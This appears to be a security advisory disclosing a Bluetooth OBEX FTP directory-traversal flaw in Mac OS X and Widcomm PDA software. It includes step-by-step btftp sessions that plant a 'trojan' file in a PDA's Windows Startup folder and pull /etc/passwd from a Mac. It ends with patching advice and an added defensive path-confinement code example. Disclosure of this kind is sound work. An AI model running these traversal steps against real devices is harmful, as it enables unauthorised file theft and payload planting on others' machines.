In DMA[2005-0502a] I stated that "...I can not confirm nor deny that files can be placed or retrieved via OBEX FTP and the ../../ method. I have only been able to list files using my current obex client (Against Mac OSX)."

With a modified version of btftp from Affix-3.2.0 I am now able to confirm that an attacker also has the ability to both grab and put files outside of the default drop path when using OBEX FTP. Zero authentication is required on OSX if an unpatched machine is being used. I can also now state that Widcomm software on PDAs is also affected. This is NOT the same as my object push ../ vulnerability. This Widcomm bug is yet another bug that has not been disclosed in the past. Some PDAs require authentication for OBEX FTP ... some do not.

Here is an example attack against my HP iPaq 2215:

animosity:/usr/src/affix-3.2.0# btftp
Affix version: Affix 3.2.0
Welcome to btftp (OBEX) tool. Type ? for help.
Mode: Bluetooth
ftp> open 00:04:3e:65:a1:c8
Service found on channel: 3
Connected.
ftp> ls
-rwdx 634 eyiot447.pwi
drwdx 0 Business
drwdx 0 Personal
drwdx 0 Templates
Command complete.
ftp> cd ../
Command complete.
ftp> ls
drwdx 0 ..
Command complete.
ftp> cd Windows
Command complete.
ftp> cd Startup
Command complete.
ftp> put /etc/hosts trojan
Transfer started...
Transfer complete.
257 bytes sent in 0.5 secs (5140.00 B/s)
ftp> ls trojan
Browsing error: OBEX error: Internal server error (0x50)
ftp>

If I go to the iPaq and browse the folder in question, the file is sitting right where I placed it.

Here is an example attack against my Apple OSX machine; this shows me grabbing /etc/passwd:

animosity:/usr/src/affix-3.2.0# btftp
Affix version: Affix 3.2.0
Welcome to btftp (OBEX) tool. Type ? for help.
Mode: Bluetooth
ftp> open 00:11:95:4f:60:1f
Service found on channel: 15
Connected.
ftp> ls
d---- 0 Faxes
d---- 0 New Folder
d---- 0 SC Info
Command complete.
ftp> cd ../
Command complete.
ftp> ls
d---- 0 ..
----- 195662 4D WebSTAR Installer.log
d---- 0 johnh
d---- 0 kevinfinisterre
d---- 0 Shared
d---- 0 webstar
Command complete.
ftp> cd ../
Command complete.
ftp> ls
d---- 0 ..
d---- 0 Applications
d---- 0 automount
d---- 0 bin
d---- 0 cores
----- 3584 Desktop DB
----- 4482 Desktop DF
d---- 0 dev
d---- 0 Developer
----- 11 etc
d---- 0 File Transfer Folder
d---- 0 Library
----- 9 mach
----- 571184 mach.sym
----- 3872560 mach_kernel
d---- 0 Network
d---- 0 private
d---- 0 sbin
d---- 0 System
----- 11 tmp
d---- 0 Users
d---- 0 usr
----- 11 var
d---- 0 Volumes
Command complete.
ftp> cd etc
Command complete.
ftp> ls
d---- 0 ..
----- 753 6to4.conf
----- 515 afpovertcp.cfg
----- 15 aliases
----- 16384 aliases.db
----- 1046 amd.conf.template
----- 112 amd.map.template
d---- 0 auth
----- 14761 authorization
----- 16541 authorization.cac
----- 160 bashrc
d---- 0 charset
----- 295 crontab
----- 189 csh.cshrc
----- 83 csh.login
----- 39 csh.logout
d---- 0 cups
----- 24 daily
d---- 0 defaults
----- 0 dumpdates
----- 695 efax.rc
----- 0 find.codes
d---- 0 fonts
----- 293 fstab
----- 150 fstab.hd
----- 119 ftpusers
----- 576 gdb.conf
----- 5678 gettytab
----- 699 group
----- 491 hostconfig
----- 492 hostconfig~
----- 0 hosts.equiv
----- 0 hosts.lpd
d---- 0 httpd
d---- 0 idmap
----- 2893 inetd.conf
----- 12 kcpassword
----- 0 kern_loader.conf
----- 30 localtime
----- 131072 lowcase.dat
d---- 0 mach_init.d
d---- 0 mach_init_per_user.d
----- 105 mail.rc
----- 891 manpath.config
----- 1259 master.passwd
----- 88039 moduli
----- 28 monthly
----- 19 motd
----- 905 named.conf
----- 53 networks
----- 132 notify.conf
----- 44 ntp.conf
d---- 0 openldap
d---- 0 pam.d
----- 1374 passwd
d---- 0 pdb
d---- 0 periodic
----- 38693 php.ini.default
d---- 0 postfix
d---- 0 ppp
----- 125 profile
----- 5766 protocols
d---- 0 racoon
----- 8099 rc
----- 3572 rc.boot
----- 4178 rc.cleanup
----- 2356 rc.common
----- 4763 rc.netboot
----- 20 resolv.conf
d---- 0 resolver
----- 13 rmt
----- 0 rmtab
----- 971 rpc
----- 983 rtadvd.conf
----- 572576 services
----- 170 shells
----- 52 slpsa.conf
----- 1732 smb.conf
----- 1144 ssh_config
----- 668 ssh_host_dsa_key
----- 590 ssh_host_dsa_key.pub
----- 515 ssh_host_key
----- 319 ssh_host_key.pub
----- 883 ssh_host_rsa_key
----- 210 ssh_host_rsa_key.pub
----- 2409 sshd_config
----- 361 sudoers
----- 798 syslog.conf
----- 2442 ttys
----- 131072 upcase.dat
----- 65536 valid.dat
d---- 0 vfs
----- 26 weekly
----- 238 xinetd.conf
d---- 0 xinetd.d
----- 0 xtab
Command complete.
ftp> get passwd
Transfer started...
Transfer complete.
268564544 bytes received in 0.34 secs (789895717.65 B/s)

animosity:/usr/local/bin# cat passwd
##
# User Database
#
# Note that this file is consulted when the system is running in single-user
# mode. At other times this information is handled by one or more of:
# lookupd DirectoryServices
# By default, lookupd gets information from NetInfo, so this file will
# not be consulted unless you have changed lookupd's configuration.
# This file is used while in single user mode.
#
# To use this file for normal authentication, you may enable it with
# /Applications/Utilities/Directory Access.
##
nobody:*:-2:-2:Unprivileged User:/:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
smmsp:*:25:25:Sendmail User:/private/etc/mail:/usr/bin/false
lp:*:26:26:Printing Services:/var/spool/cups:/usr/bin/false
postfix:*:27:27:Postfix User:/var/spool/postfix:/usr/bin/false
www:*:70:70:World Wide Web Server:/Library/WebServer:/usr/bin/false
eppc:*:71:71:Apple Events User:/var/empty:/usr/bin/false
mysql:*:74:74:MySQL Server:/var/empty:/usr/bin/false
sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false
qtss:*:76:76:QuickTime Streaming Server:/var/empty:/usr/bin/false
cyrus:*:77:6:Cyrus User:/var/imap:/usr/bin/false
mailman:*:78:78:Mailman user:/var/empty:/usr/bin/false
appserver:*:79:79:Application Server:/var/empty:/usr/bin/false
unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false

This shows me placing a file in /tmp:

Affix version: Affix 2.1.1
Wellcome to OBEX ftp. Type ? for help.
Mode: Bluetooth
SDP: yes
ftp> open 00:11:95:4f:60:1f
Connected.
ftp> ls
d---- 0 Faxes
d---- 0 New Folder
d---- 0 SC Info
Command complete.
ftp> cd ../
Command complete.
ftp> cd ../
Command complete.
ftp> cd tmp
Command complete.
ftp> ls
d---- 0 ..
Command complete.
ftp> put /etc/hosts hosts
Transfer started...
Transfer complete.
257 bytes sent in 0.10 secs (2570.00 B/s)
ftp> ls
d---- 0 ..
d---- 0 501
----- 257 hosts
Command complete.

Keep in mind that you are using the permissions of the currently logged-in user, so you may not have access to everything. It seems pretty trivial to turn these issues into a worm or some other form of automated attack. Please apply your Apple updates and turn off that Widcomm stuff if you aren't using it! Do NOT accept requests from unknown Bluetooth sources.

enjoy.

-KF
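The root cause shown in the transcripts above is an OBEX FTP server that hands the client's folder name (here "../") straight to the filesystem. As an added defensive example that is not code from the advisory, Affix, Widcomm or Apple, the following hypothetical server-side logic confines every SETPATH, PUT and GET name to the configured root folder; the class names and the root path are assumptions.

```python
import os

class TraversalError(ValueError):
    """Raised when a client request would resolve outside the OBEX root."""


class ObexFolderRoot:
    """Per-client current folder below a fixed root (constructed, hypothetical OBEX FTP server logic)."""

    def __init__(self, root: str) -> None:
        # realpath once so the containment check in resolve() compares like with like
        self.root = os.path.realpath(root)
        self.cwd: list[str] = []  # virtual path components below root

    @staticmethod
    def _check_component(name: str) -> str:
        # A name must be ONE plain component: no separators, no '.'/'..', no NUL, not empty.
        # Passing '../' straight through to the filesystem is exactly the bug in the advisory.
        if not name or name in (".", "..") or any(c in name for c in "/\\\x00"):
            raise TraversalError(f"rejected path component: {name!r}")
        return name

    def setpath(self, name: str = "", backup: bool = False) -> str:
        """OBEX SETPATH: backup flag goes up one level (never above root); a
        non-empty name enters a child folder; an empty name returns to root."""
        if backup:
            if self.cwd:
                self.cwd.pop()
        elif name == "":
            self.cwd.clear()
        else:
            self.cwd.append(self._check_component(name))
        return self.resolve()

    def try_setpath(self, name: str) -> bool:
        """True if SETPATH to `name` was accepted; False means answer OBEX Forbidden."""
        try:
            self.setpath(name)
            return True
        except TraversalError:
            return False

    def resolve(self, name: str = "") -> str:
        """Real filesystem path for a PUT/GET of `name` in the current folder, with a
        final prefix check as defence in depth (also catches symlinks under the root)."""
        parts = self.cwd + ([self._check_component(name)] if name else [])
        path = os.path.realpath(os.path.join(self.root, *parts))
        if os.path.commonpath([self.root, path]) != self.root:
            raise TraversalError(f"escapes root: {path}")
        return path
```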